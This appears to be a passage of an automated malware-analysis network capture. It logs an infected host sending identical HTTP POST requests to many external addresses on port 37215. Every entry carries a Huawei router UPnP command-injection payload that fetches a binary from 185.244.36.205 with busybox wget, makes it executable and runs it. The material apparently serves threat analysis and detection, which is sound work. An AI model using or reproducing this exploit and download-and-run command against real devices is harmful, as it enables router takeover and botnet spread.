                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1983192.168.2.155675694.81.185.4537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.095884085 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1984192.168.2.1544736190.104.190.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.095959902 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1985192.168.2.155795845.193.120.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.096014977 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1986192.168.2.1545482121.101.8.6737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.096318960 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1987192.168.2.153681845.25.176.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.097054958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1988192.168.2.1546408181.153.37.14737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.097491980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1989192.168.2.1555242156.194.186.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.097729921 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1990192.168.2.1555792157.196.191.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.097870111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1991192.168.2.1539604102.230.106.15737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.098262072 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1992192.168.2.1538482197.218.150.7637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.098649025 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
